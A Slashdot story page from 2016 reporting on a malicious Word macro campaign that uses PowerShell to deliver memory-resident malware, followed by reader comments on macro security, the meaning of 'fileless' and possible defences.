Docs With Malicious Macros Deliver Fileless Malware (csoonline.com)

← Back to Stories (view on slashdot.org)

Docs With Malicious Macros Deliver Fileless Malware (csoonline.com)

Posted by BeauHD on Monday March 14, 2016 @11:12AM from the monthly-subscription-to-malicious-malware dept.

itwbennett writes: Researchers from Palo Alto Networks warn that attackers are using Word documents with malicious macros and PowerShell to infect computers with fileless malware. The rogue PowerShell script performs a variety of checks on the computer aimed at finding systems that are used to conduct financial transactions and to avoid systems that belong to security researchers as well as medical and educational institutions. "Due to the target-specific details contained within the spam emails and the use of memory-resident malware, this particular campaign should be treated as a high threat," the Palo Alto researchers said in a blog post. A similar combination of PowerShell and fileless malware was observed last week by researchers from the SANS Institute's Internet Storm Center.

39 comments

Min score:

Reason:

Sort:

Why the fuck is there a Canada flag icon? by Anonymous Coward · 2016-03-14 11:19 · Score: 2, Interesting

Why the fuck is there a Canada flag icon for this submission?
1. Re:Why the fuck is there a Canada flag icon? by ClickOnThis · 2016-03-14 11:28 · Score: 1
  
  Why the fuck is there a Canada flag icon for this submission?
  You beat me to it. Why indeed? Canada is only one of several countries mentioned in TFAs. It makes no sense to single Canada out.
  
  --
  If it weren't for deadlines, nothing would be late.
2. Re:Why the fuck is there a Canada flag icon? by BeerCat · 2016-03-14 11:29 · Score: 1
  
  Would you have read it if there hadn't been?
  
  --
  "She's furniture with a pulse"
3. Re:Why the fuck is there a Canada flag icon? by Lumpy · 2016-03-14 11:48 · Score: 2
  
  It only affects canadian windows.
  
  --
  Do not look at laser with remaining good eye.
4. Re:Why the fuck is there a Canada flag icon? by Irate+Engineer · 2016-03-14 12:02 · Score: 2
  
  Blame Canada!
  
  --
  Left MS Windows for Linux Mint and never looked back!
  Vote for Bernie in 2016!
5. Re:Why the fuck is there a Canada flag icon? by Anonymous Coward · 2016-03-14 21:57 · Score: 0
  
  Bomb Canada!
6. Re:Why the fuck is there a Canada flag icon? by wardrich86 · 2016-03-15 04:10 · Score: 1
  
  *Windouws
7. Re:Why the fuck is there a Canada flag icon? by Lumpy · 2016-03-15 07:23 · Score: 1
  
  You forgot the Eh? you hoser..
  It's Windouws Eh?
  
  --
  Do not look at laser with remaining good eye.
8. Re:Why the fuck is there a Canada flag icon? by wardrich86 · 2016-03-15 08:21 · Score: 1
  
  Fuckin' eh, buddy. Won't let it happen again.
Word Macros by Anonymous Coward · 2016-03-14 11:46 · Score: 1

Sorry, if you still have this shit enabled in **2016**, you deserve the pwnag3.
1. Re:Word Macros by Anonymous Coward · 2016-03-14 12:13 · Score: 4, Insightful
  
  Sorry, if you still have this shit enabled in **2016**, you deserve the pwnag3.
  There's nothing wrong with macros, per se. The problem is massive design flaws like this:
  "The documents contained macros that, if allowed to run, execute a hidden instance of powershell.exe"
  A macro should be able to perform operations on a document, but there is absolutely no reason why a macro should be able to launch an external executable file. That is stupidity at a mind boggling level.
2. Re:Word Macros by Teun · 2016-03-14 12:21 · Score: 2
  
  That is stupidity at a mind boggling level.
  I believe you wanted to say MS.
  
  --
  "The likes of Facebook and WhatsApp are free to those whose privacy is of zero value."
3. Re:Word Macros by Anonymous Coward · 2016-03-14 12:26 · Score: 1
  
  If you've ever worked with VBA, you'd know that there are literally dozens, if not hundreds, of other hooks into the underlying system. The platform can manipulate sets of docs, filesystems, and retried data from online sources if it wants. Take away these features and I'm sure that thousands of corporate apps would quit working. It's the corporate way - allow some kind of remote automation because IT administrators are lazy. Nevermind that it can't possibly be secured.
4. Re:Word Macros by secretsquirel · 2016-03-14 16:37 · Score: 0
  
  If Microsoft pushed and update to disable this stuff, that would be, well, entertaining.
Get one Get Many by rtb61 · 2016-03-14 11:57 · Score: 4, Insightful

I got hit with a bundle of them, one after another after another, over a couple of weeks. I think I likely kept getting them because I did not read them but simply forwarded them to http://www.acma.gov.au/Citizen.... I assume as part of their spam analysis with a view to prosecution, those went into some ones more law focused inbox. Forwarding them on to your local authorities might not help much but it certainly doesn't hurt and it is still more satisfying than just blocking them and it might, just might lead to keeping the authorities appropriately busy and a prosecution occurring, one can only hope and a little hope is better than none at all. Oh yeah and I most certainly do not run M$ Office - Libre Office for me, for many, many reasons, least of which those much repeated attacks.

--
Chaos - everything, everywhere, everywhen
1. Re:Get one Get Many by HexaByte · 2016-03-18 02:49 · Score: 1
  
  So... If you're using Libre Office, you won't get pawn3d, right? Maybe they'll have a new rash of downloads now.
  
  --
  HexaByte - he's a square and a half!
2. Re:Get one Get Many by rtb61 · 2016-03-18 11:50 · Score: 1
  
  Well, no, I use Libre Office because it provides all I need, they do not dick around with GUI changes to stick in patent protections to prevent competition, I do not need to relearn it every few years, to avoid document lock in, and basic is a shit macro language (I actually much preferred the program specific macros that aligned with the command structure and I feel a spread sheet is a better programming environment, it creates a better mind map of the program, different sheets, different areas in sheets, linking sheets, it provided a much more cellular approach to programming), I don't have to keep buying it again and again and again or else loose the ability to share documents with others and I got really, really, pissed of with changes that M$ purposefully introduced that improved their profits at the expense of user experience and usability. The only M$ program I use is the operating system and that is tied to game playing and nothing else, simply because it provides access to the greatest number of discounted games and my existing game library.
  I will, never, I repeat never use a losephone(winphone a marketdroid joke) or tablet or TV or any other M$ program, not browsing, not email, not anything. Quite simply they are just too much of a pain in the arse to bother worth dealing with, the fuck around is just endless with them and now the privacy invasiveness to steal creative ideas, to spy on citizens for government for profit, to steal insider business secrets (make no mistake that is core of windows 10, think of the billions of profits in insider trading monitoring the home computers of business executives, what they a buying, what they are planning, what kind of mood they are in confident or worried, chatter about their employment and the government is letting them get away with it because insiders will share in it). As far as I am concerned they are shit eating scum and I will avoid all possible interactions with them and there is no coming back from that.
  
  --
  Chaos - everything, everywhere, everywhen
Fileless? by Anonymous Coward · 2016-03-14 12:09 · Score: 2, Interesting

If it involves a document, how is it fileless?
1. Re:Fileless? by Anonymous Coward · 2016-03-14 12:57 · Score: 0
  
  powershell doesn't need to create a file to run. Its fileless in that it is 100% in ram.
2. Re:Fileless? by Anonymous Coward · 2016-03-14 15:13 · Score: 0
  
  So what you're saying is a Microsoft Office document file contains a malicious set of macro instructions?
3. Re:Fileless? by iMouse · 2016-03-14 15:26 · Score: 1
  
  The actual file itself is not malicious. You can open it on any OS with any MS Office-compatible product and be fine. If is if and when the macro is executed that it goes out to web to pull down a downloader Trojan. Lately, the downloaders have been pulling in copies of CryptoWall and banking Trojans such as Dridex.
4. Re:Fileless? by Anonymous Coward · 2016-03-14 19:47 · Score: 0
  
  An executable (here, a document that contains executable code) that downloads a trojan is not malicious?
5. Re:Fileless? by Anonymous Coward · 2016-03-14 22:27 · Score: 0
  
  But the macro is still contained in the file. Fileless would be if the malware would enter the system by network, stayd in ram all the time and never needed to use a file on disk for storage. This seems not to be the case here.
I have to ask by PinkyGigglebrain · 2016-03-14 12:40 · Score: 1

How the fuck is this still happening? Its 2016 for Fates sake. How many years and versions of Word/Office have we had to deal with since "Mellissa"?
1. Re:I have to ask by Anonymous Coward · 2016-03-14 12:48 · Score: 0
  
  You haven't seen dirty corporate apps written entirely using VBA macros have you? You'd be amazed at the sort of garbage that people do on such a platform. These implementations rely on the shit and security nightmare that is VBA.
2. Re:I have to ask by Anonymous Coward · 2016-03-14 13:30 · Score: 0
  
  I'm still waiting for Anna Kournikova to reply to my marriage proposal, the pics she sent were so hot.
3. Re:I have to ask by Mogster · 2016-03-14 13:52 · Score: 1
  
  How the fuck is this still happening? Its 2016 for Fates sake. How many years and versions of Word/Office have we had to deal with since "Mellissa"?
  Agree entirely - the Millennium called it wants its macros back
  
  --
  ACK NAK RST
4. Re:I have to ask by secretsquirel · 2016-03-14 16:41 · Score: 0
  
  Oh the things I've seen. :shudder:
  (but all in all there is a reason so much stuff gets done in VBA, development costs on proper apps would be in many cases prohibitive)
5. Re:I have to ask by LordWabbit2 · 2016-03-14 18:59 · Score: 2
  
  And then had to convert the pile of VBA crap into a working website.
  
  These implementations rely on the shit and security nightmare that is VBA
  What security? Security would just frustrate the business people cranking out the VBA to speed up their daily jobs. The real danger here is not VBA per se, it's the corporate mentality that the company uses Macro enabled documents so they keep giving it permission to run, even when they don't recognize the document.
  
  --
  There are three kinds of falsehood: the first is a 'fib,' the second is a downright lie, and the third is statistics.
Malicious macro malware infests computers by khz6955 · 2016-03-14 14:20 · Score: 1

What was the name of the Operating System this malicious macro malware ran on?
Seems like the easy way to avoid this... by azbot · 2016-03-14 14:51 · Score: 1

is to become a researcher...?
1. Re:Seems like the easy way to avoid this... by Anonymous Coward · 2016-03-14 15:04 · Score: 0
  
  That or fake it. Seems a lot of malware is deliberately evading security researchers and VMs. So perhaps the best offense is deploying appropriately named dummy files (nmap, debuggers, etc) to your SOE, and running it in a VM.
2. Re:Seems like the easy way to avoid this... by iMouse · 2016-03-14 15:32 · Score: 1
  
  This development makes me a bit nervous since VMs and commercialized sandboxes are how a lot of products like Palo Alto's own Wildfire function.
Word Macros are dangerous? Who knew? by gordguide · 2016-03-14 15:43 · Score: 1

1995 wants it's News Story back.
1. Re:Word Macros are dangerous? Who knew? by Anonymous Coward · 2016-03-15 04:46 · Score: 0
  
  did you warn them about the dot com bubble, 9/11, and the housing bubble?
Brainless? by Anonymous Coward · 2016-03-15 00:32 · Score: 0

You don't understand. This is fileless in the same way as this article is brainless: There was actually a brain (of sorts) at work but it just doesn't count.
RAM scanner in a hypervisor the best defense? by castionsosa · 2016-03-15 02:26 · Score: 1

Seems in cases like this where the Trojan is entirely in RAM, the best defense would be to have a RAM scanner on the hypervisor level that would scan VMs for things like this, and if found, suspend/snapshot the VM, and allow recovery via various methods (continue with the VM, shut the VM down and run a scan against the disk image, roll the VM back to a safe snapshot, etc.)
With ransomware also a threat, having AV on the hypervisor level can likely be the best defense, especially with VM snapshots coupled with snapshots of shared filesystems.
Is it really "fileless"? by nuckfuts · 2016-03-15 04:13 · Score: 1

A lot of antivirus protection happens during file access, which should make "fileless" malware more difficult to detect. The article is a bit fuzzy on whether this malware is truly fileless, however, describing it as "similar" to "fileless malware" that...

creates a registry key that launches a hidden PowerShell instance at every system start-up.
Given that "the registry" is nothing more than a collection of files, writing a key to the registry hardly qualifies as "fileless" operation.